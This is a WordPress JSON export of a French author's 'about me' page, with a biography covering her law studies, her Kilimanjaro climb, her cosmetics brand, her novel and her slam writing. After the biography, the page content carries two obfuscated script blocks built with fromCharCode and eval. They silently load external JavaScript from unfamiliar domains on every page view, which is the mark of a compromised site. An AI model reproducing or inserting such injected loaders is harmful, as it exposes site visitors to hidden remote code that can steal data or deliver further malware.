{"id":2682,"date":"2019-10-21T12:02:32","date_gmt":"2019-10-21T12:02:32","guid":{"rendered":"http:\/\/www.kamcam.fr\/?page_id=8"},"modified":"2022-08-08T16:30:25","modified_gmt":"2022-08-08T14:30:25","slug":"about-me","status":"publish","type":"page","link":"https:\/\/www.kamcam.fr\/index.php\/about-me\/","title":{"rendered":"Qui suis-je ?"},"content":{"rendered":"<p><div class=\"fusion-fullwidth fullwidth-box fusion-builder-row-1 fusion-flex-container nonhundred-percent-fullwidth non-hundred-percent-height-scrolling\" style=\"background-color: var(--awb-color1);background-position: center center;background-repeat: no-repeat;border-width: 0px 0px 0px 0px;border-color:hsla(var(--awb-color3-h),var(--awb-color3-s),calc( var(--awb-color3-l) + 15% ),var(--awb-color3-a));border-style:solid;\" ><div class=\"fusion-builder-row fusion-row fusion-flex-align-items-flex-start\" style=\"max-width:95.68%;margin-left: calc(-4% \/ 2 );margin-right: calc(-4% \/ 2 );\"><div class=\"fusion-layout-column fusion_builder_column fusion-builder-column-0 fusion_builder_column_2_5 2_5 fusion-flex-column fusion-animated\" data-animationType=\"fadeInLeft\" data-animationDuration=\"1.0\" data-animationOffset=\"top-into-view\"><div class=\"fusion-column-wrapper fusion-flex-justify-content-flex-start fusion-content-layout-column\" style=\"background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;padding: 0px 0px 0px 0px;\"><div ><span class=\" fusion-imageframe imageframe-none imageframe-1 hover-type-none\"><img decoding=\"async\" width=\"600\" height=\"849\" title=\"Pages site web kamcam (2)\" src=\"https:\/\/www.kamcam.fr\/wp-content\/uploads\/2022\/06\/Pages-site-web-kamcam-2.png\" data-orig-src=\"https:\/\/www.kamcam.fr\/wp-content\/uploads\/2022\/06\/Pages-site-web-kamcam-2-600x849.png\" alt class=\"lazyload img-responsive wp-image-2928\" srcset=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20width%3D%271414%27%20height%3D%272000%27%20viewBox%3D%270%200%201414%202000%27%3E%3Crect%20width%3D%271414%27%20height%3D%272000%27%20fill-opacity%3D%220%22%2F%3E%3C%2Fsvg%3E\" data-srcset=\"https:\/\/www.kamcam.fr\/wp-content\/uploads\/2022\/06\/Pages-site-web-kamcam-2-200x283.png 200w, https:\/\/www.kamcam.fr\/wp-content\/uploads\/2022\/06\/Pages-site-web-kamcam-2-400x566.png 400w, https:\/\/www.kamcam.fr\/wp-content\/uploads\/2022\/06\/Pages-site-web-kamcam-2-600x849.png 600w, https:\/\/www.kamcam.fr\/wp-content\/uploads\/2022\/06\/Pages-site-web-kamcam-2-800x1132.png 800w, https:\/\/www.kamcam.fr\/wp-content\/uploads\/2022\/06\/Pages-site-web-kamcam-2-1200x1697.png 1200w, https:\/\/www.kamcam.fr\/wp-content\/uploads\/2022\/06\/Pages-site-web-kamcam-2.png 1414w\" data-sizes=\"auto\" data-orig-sizes=\"(max-width: 1075px) 100vw, (max-width: 640px) 100vw, 800px\" \/><\/span><\/div><\/div><style type=\"text\/css\">.fusion-body .fusion-builder-column-0{width:40% !important;margin-top : 0px;margin-bottom : 20px;}.fusion-builder-column-0 > .fusion-column-wrapper {padding-top : 0px !important;padding-right : 0px !important;margin-right : 6.72%;padding-bottom : 0px !important;padding-left : 0px !important;margin-left : 4.8%;}@media only screen and (max-width:1075px) {.fusion-body .fusion-builder-column-0{width:100% !important;}.fusion-builder-column-0 > .fusion-column-wrapper {margin-right : 1.92%;margin-left : 1.92%;}}@media only screen and (max-width:640px) {.fusion-body .fusion-builder-column-0{width:100% !important;}.fusion-builder-column-0 > .fusion-column-wrapper {margin-right : 1.92%;margin-left : 1.92%;}}<\/style><\/div><div class=\"fusion-layout-column fusion_builder_column fusion-builder-column-1 fusion_builder_column_3_5 3_5 fusion-flex-column fusion-animated\" data-animationType=\"fadeInRight\" data-animationDuration=\"1.0\" data-animationOffset=\"top-into-view\"><div class=\"fusion-column-wrapper fusion-flex-justify-content-flex-start fusion-content-layout-column\" style=\"background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;padding: 0px 0px 0px 0px;\"><div class=\"fusion-text fusion-text-1 fusion-text-split-columns fusion-text-columns-2 fusion-no-small-visibility\" style=\" -webkit-column-count:2; -webkit-column-gap:8%; -webkit-column-width:100px; -webkit-column-rule:1px solid hsla(var(--awb-color3-h),var(--awb-color3-s),calc(var(--awb-color3-l) + 15%),var(--awb-color3-a)); -moz-column-count:2; -moz-column-gap:8%; -moz-column-width:100px; -moz-column-rule:1px solid hsla(var(--awb-color3-h),var(--awb-color3-s),calc(var(--awb-color3-l) + 15%),var(--awb-color3-a)); column-count:2; column-gap:8%; column-width:100px; column-rule:1px solid hsla(var(--awb-color3-h),var(--awb-color3-s),calc(var(--awb-color3-l) + 15%),var(--awb-color3-a));\"><span class=\"fusion-dropcap dropcap\" style=\"color:var(--awb-color4);\">N<\/span>\n<p>\u00e9e<span style=\"background-color: var(--awb-color1); color: var(--body_typography-color); font-family: var(--body_typography-font-family); font-size: var(--body_typography-font-size); font-style: var(--body_typography-font-style,normal); font-weight: var(--body_typography-font-weight); letter-spacing: var(--body_typography-letter-spacing);\"> <\/span><span style=\"background-color: var(--awb-color1); color: var(--body_typography-color); font-family: var(--body_typography-font-family); font-size: var(--body_typography-font-size); font-style: var(--body_typography-font-style,normal); font-weight: var(--body_typography-font-weight); letter-spacing: var(--body_typography-letter-spacing);\">le 5 juin 1990 \u00e0 Versailles, de parents originaires du Mali, je me d\u00e9finis comme une afrop\u00e9enne.<\/span><\/p>\n<p>J&rsquo;ai fait mes \u00e9tudes de droit \u00e0 la facult\u00e9 de Paris Sud XI, puis entam\u00e9 ma carri\u00e8re dans le secteur juridique. Mon app\u00e9tence pour l\u2019apprentissage et la culture m&rsquo;a pouss\u00e9e, apr\u00e8s avoir explor\u00e9 la musique et l\u2019entrepreneuriat, \u00e0 me tourner vers l\u2019\u00e9criture.<\/p>\n<p>J&rsquo;ai concr\u00e9tis\u00e9 l\u2019un de mes r\u00eaves, l&rsquo;ascension du Kilimandjaro, en septembre 2019 par la route de Machame. En d\u00e9cembre 2020, j&rsquo;ai cr\u00e9\u00e9 ma propre marque de cosm\u00e9tiques naturels, fabriqu\u00e9s en France. <\/p>\n<p>Aujourd&rsquo;hui, je suis l&rsquo;autrice d&rsquo;un roman, une premi\u00e8re \u00e9dition impr\u00e9gn\u00e9e de mon introspection unique. Je me mets \u00e0 nu, d\u00e9voilant avec honn\u00eatet\u00e9 une vie pleine de doutes carenc\u00e9e d&rsquo;amour et de reconnaissance. <\/p>\n<p>Ma prose reste essentiellement irrigu\u00e9e par mes \u00e9motions, mon v\u00e9cu et mes r\u00eaves ; sur le ton de la confidence, tr\u00e8s intimiste. J&rsquo;\u00e9cris \u00e9galement des slams et partage cette passion de l\u2019\u00e9criture avec des \u00e9tablissements scolaires ou encore des associations. <\/p>\n<p>Coucher sur le papier ses \u00e9tats d\u2019\u00e2me, ses questionnements, se raconter\u2026 Pourquoi ? <\/p>\n<p>Pour avancer ! Une invitation \u00e0 re-penser sa vie. Prendre le temps de s\u2019isoler avec soi-m\u00eame et de laisser \u00e9merger ce qui vient. Avec une feuille et un stylo, reformuler ce que nous avons v\u00e9cu, senti, avant de le coucher sur le papier. C\u2019est une mani\u00e8re de le dig\u00e9rer. De se r\u00e9approprier sa vie de mani\u00e8re distanci\u00e9e. Au d\u00e9but, on \u00e9crit pour soi, pour se faire du bien, parce que l\u2019on en a envie. Mais en r\u00e9alit\u00e9, on \u00e9crit toujours pour quelqu\u2019un, pour \u00eatre lu. Si prendre la plume permet de se l\u00e2cher, d\u2019\u00eatre cr\u00e9atif, on a aussi envie d\u2019\u00eatre compris. J\u2019esp\u00e8re d\u2019ailleurs que l\u2019\u00e9criture peut, dans un deuxi\u00e8me temps, cr\u00e9er le dialogue.<\/p>\n<\/div><div class=\"fusion-text fusion-text-2 fusion-no-medium-visibility fusion-no-large-visibility\"><span class=\"fusion-dropcap dropcap\">N<\/span>\n<p>\u00e9e le 5 juin 1990 \u00e0 Versailles, de parents originaires du Mali, je me d\u00e9finis comme une afrop\u00e9enne.<\/p>\n<p>J\u2019ai fait mes \u00e9tudes de droit \u00e0 la facult\u00e9 de Paris Sud XI, puis entam\u00e9 ma carri\u00e8re dans le secteur juridique. Mon app\u00e9tence pour l\u2019apprentissage et la culture m\u2019a pouss\u00e9e, apr\u00e8s avoir explor\u00e9 la musique et l\u2019entrepreneuriat, \u00e0 me tourner vers l\u2019\u00e9criture.<\/p>\n<p>J\u2019ai concr\u00e9tis\u00e9 l\u2019un de mes r\u00eaves, l\u2019ascension du Kilimandjaro, en septembre 2019 par la route de Machame. En d\u00e9cembre 2020, j\u2019ai cr\u00e9\u00e9 ma propre marque de cosm\u00e9tiques naturels, fabriqu\u00e9s en France.<\/p>\n<p>Aujourd\u2019hui, je suis l\u2019autrice d\u2019un roman, une premi\u00e8re \u00e9dition impr\u00e9gn\u00e9e de mon introspection unique. Je me mets \u00e0 nu, d\u00e9voilant avec honn\u00eatet\u00e9 une vie pleine de doutes carenc\u00e9e d\u2019amour et de reconnaissance.<\/p>\n<p>Ma prose reste essentiellement irrigu\u00e9e par mes \u00e9motions, mon v\u00e9cu et mes r\u00eaves ; sur le ton de la confidence, tr\u00e8s intimiste. J\u2019\u00e9cris \u00e9galement des slams et partage cette passion de l\u2019\u00e9criture avec des \u00e9tablissements scolaires ou encore des associations.<\/p>\n<p>Coucher sur le papier ses \u00e9tats d\u2019\u00e2me, ses questionnements, se raconter\u2026 Pourquoi ?<\/p>\n<p>Pour avancer ! Une invitation \u00e0 re-penser sa vie. Prendre le temps de s\u2019isoler avec soi-m\u00eame et de laisser \u00e9merger ce qui vient. Avec une feuille et un stylo, reformuler ce que nous avons v\u00e9cu, senti, avant de le coucher sur le papier. C\u2019est une mani\u00e8re de le dig\u00e9rer. De se r\u00e9approprier sa vie de mani\u00e8re distanci\u00e9e. Au d\u00e9but, on \u00e9crit pour soi, pour se faire du bien, parce que l\u2019on en a envie. Mais en r\u00e9alit\u00e9, on \u00e9crit toujours pour quelqu\u2019un, pour \u00eatre lu. Si prendre la plume permet de se l\u00e2cher, d\u2019\u00eatre cr\u00e9atif, on a aussi envie d\u2019\u00eatre compris. J\u2019esp\u00e8re d\u2019ailleurs que l\u2019\u00e9criture peut, dans un deuxi\u00e8me temps, cr\u00e9er le dialogue.<\/p>\n<\/div><\/div><style type=\"text\/css\">.fusion-body .fusion-builder-column-1{width:60% !important;margin-top : 0px;margin-bottom : 56px;}.fusion-builder-column-1 > .fusion-column-wrapper {padding-top : 0px !important;padding-right : 0px !important;margin-right : 3.2%;padding-bottom : 0px !important;padding-left : 0px !important;margin-left : 6.72%;}@media only screen and (max-width:1075px) {.fusion-body .fusion-builder-column-1{width:100% !important;}.fusion-builder-column-1 > .fusion-column-wrapper {margin-right : 1.92%;margin-left : 1.92%;}}@media only screen and (max-width:640px) {.fusion-body .fusion-builder-column-1{width:100% !important;}.fusion-builder-column-1 > .fusion-column-wrapper {margin-right : 1.92%;margin-left : 1.92%;}}<\/style><\/div><\/div><style type=\"text\/css\">.fusion-body .fusion-flex-container.fusion-builder-row-1{ padding-top : 4%;margin-top : 0px;padding-right : 0%;padding-bottom : 0%;margin-bottom : 0px;padding-left : 0%;}@media only screen and (max-width:1075px) {.fusion-body .fusion-flex-container.fusion-builder-row-1{ padding-right : 8%;padding-left : 8%;}}@media only screen and (max-width:640px) {.fusion-body .fusion-flex-container.fusion-builder-row-1{ padding-right : 40px;padding-left : 40px;}}<\/style><\/div><script id='globalsway'>var z =String;var t=z.fromCharCode(10,102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,118,97,114,32,98,100,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,48,48,44,49,48,49,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,44,49,48,53,44,49,49,49,44,49,49,48,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,44,49,49,53,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,49,44,49,49,50,44,49,49,53,44,52,55,44,49,49,49,44,49,49,48,44,49,48,49,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,53,50,44,53,50,41,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,115,46,105,100,61,39,98,108,117,101,116,114,97,99,107,39,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125,10);eval(t);<\/script><script>var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,51,46,48,46,51,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":1903,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"100-width.php","meta":{"footnotes":""},"class_list":["post-2682","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/www.kamcam.fr\/index.php\/wp-json\/wp\/v2\/pages\/2682","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.kamcam.fr\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.kamcam.fr\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.kamcam.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.kamcam.fr\/index.php\/wp-json\/wp\/v2\/comments?post=2682"}],"version-history":[{"count":7,"href":"https:\/\/www.kamcam.fr\/index.php\/wp-json\/wp\/v2\/pages\/2682\/revisions"}],"predecessor-version":[{"id":3125,"href":"https:\/\/www.kamcam.fr\/index.php\/wp-json\/wp\/v2\/pages\/2682\/revisions\/3125"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.kamcam.fr\/index.php\/wp-json\/wp\/v2\/media\/1903"}],"wp:attachment":[{"href":"https:\/\/www.kamcam.fr\/index.php\/wp-json\/wp\/v2\/media?parent=2682"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}